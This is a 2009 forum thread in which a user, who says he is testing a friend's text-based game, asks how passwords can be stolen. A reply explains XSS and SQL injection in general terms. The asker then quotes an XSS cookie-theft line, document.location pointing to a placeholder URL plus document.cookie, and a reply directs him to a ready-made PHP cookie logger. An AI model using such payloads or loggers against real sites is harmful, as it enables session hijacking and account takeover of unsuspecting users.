mrtg
+ Reply to Thread
Results 1 to 4 of 4

Thread: SessionID's, ETC.

  1. #1
    Join Date
    Jan 2009
    Posts
    2

    SessionID's, ETC.

    Hello,

    Let me first introduce myself, since I'm new to this forum.
    My real name is Robin, I'm a 25 year old male and live in the Netherlands (so already excuse me if I'm hard to understand:P)

    I'm currently helping my friend, which is working on a textbased game. He asked me to find any ways trying to steal users' passwords, through sessionID's and whatever more is available.

    Which possibilities are there to actually 'steal' someones password?
    If you need any more information, I'd be pleased to give it to you.

    All the best,

    Delay

  2. #2
    Join Date
    Sep 2006
    Posts
    1,651
    Welcome to the forums

    To answer your question, there are a few ways.

    XSS (Cross-Site Scripting) consists of running maliciious JavaScript on other user's PC. You can use XSS to run a script on a user that will steal their cookie(s) that they have for your website. The attacker can use the cookies and hijack the user's session and take control of his account. Read more on XSS here:

    [url]http://en.wikipedia.org/wiki/Cross-site_scripting[/url]

    Another technqiue, SQL Injection, consists of exploiting a poorly-filtered query to a database. If proper data-sanitation techniques aren't used on an application or application component that interacts with your database, the attacker can inject extra SQL into the query and run it. For example, if you have a search box that processes the user's input and queries a database to get results, an attacker could run multiple malicious SQL queries from that search box, if you don't filter the user input correctly. Read more on SQL Injection here:

    [url]http://en.wikipedia.org/wiki/SQL_injection[/url]

    Those are two common vulnerabilities to look out for.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  3. #3
    Join Date
    Jan 2009
    Posts
    2
    Alright, thank you and thank you for the help.

    So, as far as I read, XSS makes it able to write down cookies to a webpage, with some little help of javascript.

    Hmm, interesting fact.

    One more question for today:

    How exactly do you (when you've implemented Javacript (document.location='weburlhere' + document.cookie) write the requested cookie (and ofc session) to some other place?


    Regards,

    Delay

  4. #4
    Join Date
    Sep 2006
    Posts
    1,651
    Quote Originally Posted by Delay View Post
    How exactly do you (when you've implemented Javacript (document.location='weburlhere' + document.cookie) write the requested cookie (and ofc session) to some other place?
    You will have to use PHP to do that. You can find existing code for a cookie logger at [url=http://www.xssed.com/article/6/Paper_Kr*ws_Cross-Site_Scripting_Tutorial/#PART%20VI]this link[/url].

    But if you want to write your own PHP cookie logger, you'll have to learn PHP. You can check out the [url=http://www.w*schools.com/PHP/DEfaULT.asP]W*Schools PHP Tutorial[/url], which is a great PHP tutorial site.

    But if you already are familiar with PHP programming, just do some reading on file functions like [url=http://us2.php.net/manual/en/function.fopen.php]fopen()[/url] and [url=http://us2.php.net/manual/en/function.fwrite.php]fwrite()[/url]
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts